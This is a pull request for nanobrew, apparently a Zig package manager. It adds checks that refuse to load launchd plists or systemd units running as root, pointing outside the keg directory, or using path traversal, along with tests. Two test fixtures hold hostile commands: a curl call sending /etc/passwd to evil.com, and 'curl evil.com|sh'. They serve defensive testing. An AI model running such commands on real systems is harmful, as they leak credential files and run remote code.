### PR TITLE
security: validate systemd and launchd service files before installation

### DIFF
--- a/src/security_test.zig
+++ b/src/security_test.zig
@@ -14,6 +14,8 @@ const placeholder = @import("platform/placeholder.zig");
 const store = @import("store/store.zig");
 const client = @import("api/client.zig");
 
+const launchd = @import("services/launchd.zig");
+
 // ────────────────────────────────────────────────────────────────────────
 // 1. Path traversal in package names
 // ────────────────────────────────────────────────────────────────────────
@@ -359,4 +361,196 @@ test "isValidSha256 rejects non-hex strings" {
     try testing.expect(!store.isValidSha256("abc"));
     try testing.expect(!store.isValidSha256("zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz"));
     try testing.expect(store.isValidSha256("e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"));
+}
+
+// ────────────────────────────────────────────────────────────────────────
+// 12. Launchd plist content validation
+// ────────────────────────────────────────────────────────────────────────
+
+test "isPlistSafe rejects plist with UserName root" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.evil</string>
+        \\  <key>UserName</key>
+        \\  <string>root</string>
+        \\  <key>ProgramArguments</key>
+        \\  <array>
+        \\    <string>/opt/nanobrew/prefix/Cellar/evil/1.0/bin/evil</string>
+        \\  </array>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(!launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isPlistSafe rejects plist with ProgramArguments outside keg" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.evil</string>
+        \\  <key>ProgramArguments</key>
+        \\  <array>
+        \\    <string>/usr/bin/curl</string>
+        \\    <string>http://evil.com/steal?data=/etc/passwd</string>
+        \\  </array>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(!launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isPlistSafe rejects plist with ProgramArguments path traversal" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.evil</string>
+        \\  <key>ProgramArguments</key>
+        \\  <array>
+        \\    <string>/opt/nanobrew/prefix/Cellar/../../../bin/evil</string>
+        \\  </array>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(!launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isPlistSafe rejects plist with Program key outside keg" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.evil</string>
+        \\  <key>Program</key>
+        \\  <string>/usr/bin/evil</string>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(!launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isPlistSafe rejects plist with Program key path traversal" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.evil</string>
+        \\  <key>Program</key>
+        \\  <string>/opt/nanobrew/prefix/Cellar/../../../bin/evil</string>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(!launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isPlistSafe accepts safe plist with Program key inside keg" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.redis</string>
+        \\  <key>Program</key>
+        \\  <string>/opt/nanobrew/prefix/Cellar/redis/7.2.4/bin/redis-server</string>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isPlistSafe accepts safe plist with ProgramArguments inside keg" {
+    const plist =
+        \\<?xml version="1.0" encoding="UTF-8"?>
+        \\<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        \\<plist version="1.0">
+        \\<dict>
+        \\  <key>Label</key>
+        \\  <string>homebrew.mxcl.redis</string>
+        \\  <key>ProgramArguments</key>
+        \\  <array>
+        \\    <string>/opt/nanobrew/prefix/Cellar/redis/7.2.4/bin/redis-server</string>
+        \\    <string>/opt/nanobrew/prefix/Cellar/redis/7.2.4/etc/redis.conf</string>
+        \\  </array>
+        \\</dict>
+        \\</plist>
+    ;
+    try testing.expect(launchd.isPlistSafe(plist, "/opt/nanobrew/prefix/Cellar"));
+}
+
+// ────────────────────────────────────────────────────────────────────────
+// 13. systemd service file validation
+// ────────────────────────────────────────────────────────────────────────
+
+const systemd = @import("services/systemd.zig");
+
+test "isServiceFileSafe rejects User=root" {
+    const content =
+        \\[Unit]
+        \\Description=Evil Service
+        \\
+        \\[Service]
+        \\User=root
+        \\ExecStart=/opt/nanobrew/prefix/Cellar/pkg/1.0/bin/mybin
+        \\
+        \\[Install]
+        \\WantedBy=multi-user.target
+    ;
+    try testing.expect(!systemd.isServiceFileSafe(content, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isServiceFileSafe rejects ExecStart outside keg" {
+    const content =
+        \\[Unit]
+        \\Description=Malicious Service
+        \\
+        \\[Service]
+        \\ExecStart=/bin/bash -c 'curl evil.com|sh'
+        \\
+        \\[Install]
+        \\WantedBy=multi-user.target
+    ;
+    try testing.expect(!systemd.isServiceFileSafe(content, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isServiceFileSafe rejects ExecStart with path traversal" {
+    const content =
+        \\[Unit]
+        \\Description=Traversal Service
+        \\
+        \\[Service]
+        \\ExecStart=/opt/nanobrew/prefix/Cellar/../../../bin/evil
+        \\
+        \\[Install]
+        \\WantedBy=multi-user.target
+    ;
+    try testing.expect(!systemd.isServiceFileSafe(content, "/opt/nanobrew/prefix/Cellar"));
+}
+
+test "isServiceFileSafe accepts safe service file with ExecStart inside keg" {
+    const content =
+        \\[Unit]
+        \\Description=Safe Service
+        \\
+        \\[Service]
+        \\User=_myservice
+        \\ExecStart=/opt/nanobrew/prefix/Cellar/mypkg/1.0/bin/mypkg --config /etc/mypkg.conf
+        \\
+        \\[Install]
+        \\WantedBy=multi-user.target
+    ;
+    try testing.expect(systemd.isServiceFileSafe(content, "/opt/nanobrew/prefix/Cellar"));
 }

--- a/src/services/launchd.zig
+++ b/src/services/launchd.zig
@@ -85,7 +85,56 @@ pub fn isRunning(alloc: std.mem.Allocator, label: []const u8) bool {
     return result.term.Exited == 0;
 }
 
+pub fn isPlistSafe(content: []const u8, keg_prefix: []const u8) bool {
+    // Check for UserName root
+    if (std.mem.indexOf(u8, content, "<key>UserName</key>")) |idx| {
+        const after = content[idx..];
+        if (std.mem.indexOf(u8, after, "<string>root</string>")) |_| return false;
+    }
+
+    // Check ProgramArguments — first <string> after the key must start with keg_prefix
+    if (std.mem.indexOf(u8, content, "<key>ProgramArguments</key>")) |idx| {
+        const after = content[idx..];
+        if (std.mem.indexOf(u8, after, "<string>")) |s_idx| {
+            const str_start = s_idx + "<string>".len;
+            if (str_start < after.len) {
+                const rest = after[str_start..];
+                if (std.mem.indexOf(u8, rest, "</string>")) |end| {
+                    const prog_path = rest[0..end];
+                    if (!std.mem.startsWith(u8, prog_path, keg_prefix)) return false;
+                    if (std.mem.indexOf(u8, prog_path, "..") != null) return false;
+                }
+            }
+        }
+    }
+
+    // Check Program — single <string> value must also start with keg_prefix
+    if (std.mem.indexOf(u8, content, "<key>Program</key>")) |idx| {
+        const after = content[idx..];
+        if (std.mem.indexOf(u8, after, "<string>")) |s_idx| {
+            const str_start = s_idx + "<string>".len;
+            if (str_start < after.len) {
+                const rest = after[str_start..];
+                if (std.mem.indexOf(u8, rest, "</string>")) |end| {
+                    const prog_path = rest[0..end];
+                    if (!std.mem.startsWith(u8, prog_path, keg_prefix)) return false;
+                    if (std.mem.indexOf(u8, prog_path, "..") != null) return false;
+                }
+            }
+        }
+    }
+
+    return true;
+}
+
 pub fn start(alloc: std.mem.Allocator, plist_path: []const u8) !void {
+    const plist_content = std.fs.cwd().readFileAlloc(alloc, plist_path, 64 * 1024) catch return error.LaunchctlFailed;
+    defer alloc.free(plist_content);
+    if (!isPlistSafe(plist_content, paths.CELLAR_DIR)) {
+        const err_writer = std.io.getStdErr().writer();
+        err_writer.print("nb: refusing to load unsafe plist: {s}\n", .{plist_path}) catch {};
+        return error.LaunchctlFailed;
+    }
     const result = std.process.Child.run(.{
         .allocator = alloc,
         .argv = &.{ "launchctl", "load", "-w", plist_path },

--- a/src/services/systemd.zig
+++ b/src/services/systemd.zig
@@ -92,11 +92,42 @@ pub fn isRunning(alloc: std.mem.Allocator, label: []const u8) bool {
     return result.term.Exited == 0;
 }
 
+pub fn isServiceFileSafe(content: []const u8, keg_prefix: []const u8) bool {
+    var lines = std.mem.splitScalar(u8, content, '\n');
+    while (lines.next()) |line| {
+        const trimmed = std.mem.trimLeft(u8, line, " \t");
+        // Reject User=root
+        if (std.mem.startsWith(u8, trimmed, "User=")) {
+            const value = std.mem.trimLeft(u8, trimmed["User=".len..], " \t");
+            if (std.mem.eql(u8, value, "root")) return false;
+        }
+        // Validate ExecStart points within the keg
+        if (std.mem.startsWith(u8, trimmed, "ExecStart=")) {
+            const value = std.mem.trimLeft(u8, trimmed["ExecStart=".len..], " \t");
+            const exec_path = if (value.len > 0 and value[0] == '-') value[1..] else value;
+            const end = std.mem.indexOfAny(u8, exec_path, " \t") orelse exec_path.len;
+            const bin_path = exec_path[0..end];
+            if (!std.mem.startsWith(u8, bin_path, keg_prefix)) return false;
+            if (std.mem.indexOf(u8, bin_path, "..") != null) return false;
+        }
+    }
+    return true;
+}
+
 pub fn start(alloc: std.mem.Allocator, plist_path: []const u8) !void {
     // Install the service file and start it
     const basename = std.fs.path.basename(plist_path);
     var dest_buf: [512]u8 = undefined;
     const dest = std.fmt.bufPrint(&dest_buf, "/etc/systemd/system/{s}", .{basename}) catch return error.PathTooLong;
+
+    // Read and validate the service file
+    const svc_content = std.fs.cwd().readFileAlloc(alloc, plist_path, 64 * 1024) catch return error.SystemdFailed;
+    defer alloc.free(svc_content);
+    if (!isServiceFileSafe(svc_content, paths.CELLAR_DIR)) {
+        const err_writer = std.io.getStdErr().writer();
+        err_writer.print("nb: refusing to install unsafe service file: {s}\n", .{plist_path}) catch {};
+        return error.SystemdFailed;
+    }
 
     // Copy service file to systemd directory
     const cp = std.process.Child.run(.{


### PR DESCRIPTION
## Origin

Originally submitted as PR #149 by @NeverVane (justrach/nanobrew#149).

Replicated as a maintainer-controlled branch per the project's updated security policy. See CONTRIBUTING.md for details.

## Summary

security: validate systemd and launchd service files before installation

## Attribution

All credit for the underlying work belongs to the original contributor. This PR preserves the diff exactly as submitted, with a clean rebase onto current `main`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)